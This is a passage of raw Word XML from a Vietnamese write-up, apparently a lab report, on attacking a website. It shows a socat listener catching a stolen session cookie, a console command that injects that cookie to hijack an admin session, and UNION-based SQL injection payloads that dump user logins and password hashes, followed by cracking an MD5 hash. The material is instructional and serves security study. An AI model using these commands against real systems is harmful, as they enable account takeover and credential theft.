        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>ở đây tôi sử dụng đến hệ điều hành Kali linux.</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sau khi truy cập vào hệ điều hành kali linux ta tiến hành mở Terminal bằng cách chọn vào hộp thoại đen hoặc chuột phải chọn Open in terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1135D7A2" w14:textId="70BF2714"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1EE5CB90">
          <v:shape id="Hình ảnh 57" o:spid="_x0000_i1076" type="#_x0000_t75" style="width:402.75pt;height:304.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId62" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="599E10FB" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta sử dụng câu lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo socat TCP-LISTEN:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>80,reuseaddr</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, fork -</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> .Nhấn enter để thực thi lệnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFE50B1" w14:textId="22503AEE" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="008228FC" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="225E9A40">
          <v:shape id="Hình ảnh 4" o:spid="_x0000_i1077" type="#_x0000_t75" style="width:463.5pt;height:121.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId63" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6A522A" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Bây giờ chúng ta đã có </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PHPSESSID=q0loiqhus28pqn85afl1drml75.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDF1A7B" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tiếp theo tra truy cập vào giao diện trang web để tiến hành chèn PHPSESSID vào trang web bằng cách sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1907B907" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Trên trình duyệt fire fox nháy chuột phải chọn kiểm tra phần tử HTML hoặc F12.Sau đó chọn bảng điều khiển(console).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5851FAF0" w14:textId="496D80AF"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21A170B4">
          <v:shape id="Hình ảnh 59" o:spid="_x0000_i1078" type="#_x0000_t75" style="width:468pt;height:145.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId64" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C14A845" w14:textId="3A0AA5AD" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sau khi truy cập vào bảng điều khiển,</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>ta thực thi câu lệnh bên dưới và nhấn enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F884C2A" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=” PHPSESSID=q0loiqhus28pqn85afl1drml75”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADEACB7" w14:textId="6E520086"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2CAC7003">
          <v:shape id="Hình ảnh 60" o:spid="_x0000_i1079" type="#_x0000_t75" style="width:381.75pt;height:180pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId65" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B94D0EE" w14:textId="43BD99CC" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tiếp tục giữ bảng điều khiển và click chuột vào Admin,</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>đóng bảng điều khiển.</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta truy cập thành công vào website dưới quyền quản trị viên,</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>cho phép ta thực mọi quyền insert,</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>delete,</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>update…vv.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77201C3D" w14:textId="5C2D841B"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62AE84E7">
          <v:shape id="Hình ảnh 6" o:spid="_x0000_i1080" type="#_x0000_t75" style="width:392.25pt;height:126pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId66" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E851F0" w14:textId="5E9FE8F5" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tiến hành khai thác SQL injection,</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>truy xuất,</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>thu thập thông tin của website nạn nhân.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9C2EBD" w14:textId="37B8F504" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Đầu tiên ta sử dụng lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">union select all 1,2,3,4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>hoặc</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> union select all order by 1 4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>được chèn vào thanh URL phía sau địa chỉ IP của website để tìm số trang tối đa của webite.</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB9FE98" w14:textId="78157D71"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6D4480FE">
          <v:shape id="Hình ảnh 8" o:spid="_x0000_i1081" type="#_x0000_t75" style="width:405pt;height:44.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId67" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="706909AC" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp đến sử dụng lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>union select all 1,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2,@</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>@verion,4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để kiểm tra phiên bản MySQL database mà website đang sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A50073" w14:textId="4D3213D8"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07E3E76E">
          <v:shape id="Hình ảnh 61" o:spid="_x0000_i1082" type="#_x0000_t75" style="width:468pt;height:26.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId68" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0F0415" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Để kiểm tra có bao nhiêu tên _bảng trên trang web ta sử dụng câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041C7E56" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>union select all 1,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_concat(table_name),4 from information_Schema.tables where table_Schema =database()—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54276183" w14:textId="588244F8" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3C63B778">
          <v:shape id="Hình ảnh 62" o:spid="_x0000_i1083" type="#_x0000_t75" style="width:468pt;height:98.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId69" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D4C83E" w14:textId="64A24E2C" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sau khi xuất hiện 3 tên_bảng như trên,</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ta tiến hành sử dụng câu lệnh truy xuất đến </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F12AA58" w14:textId="2EA98B18" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>union select all 1,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_concat(column_name),4 from information_Schema.columns where table_Schema =database() and table_name ='user'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1DD82C" w14:textId="17CEE6AC"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49AD48CE">
          <v:shape id="Hình ảnh 63" o:spid="_x0000_i1084" type="#_x0000_t75" style="width:468pt;height:81.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId70" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FAE089" w14:textId="0B0F95CF" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đến đây ta đã có đầy đủ thông tin.</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiến hành lấy user và password quản trị của </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>website.Tôi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sử dụng lệnh sau: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>union select all 1,2,group_concat(login,0x3a,password),4 from users—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0484A55D" w14:textId="2581DC6B"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768D4AF7">
          <v:shape id="Hình ảnh 2" o:spid="_x0000_i1085" type="#_x0000_t75" style="width:468pt;height:87pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId71" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC8A019" w14:textId="34E68881" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta đã lấy được tài khoản và mật khẩu của quản trị viên.</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Nhưng mật khẩu là một đoạn mã, ta dễ dàng đoán được mật khẩu được mã hóa bằng MD5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB2CB93" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng công cụ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MD5 gromweb</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên google ta được mật khẩu là: P4ssw0rd</w:t>
      </w:r>
    </w:p>
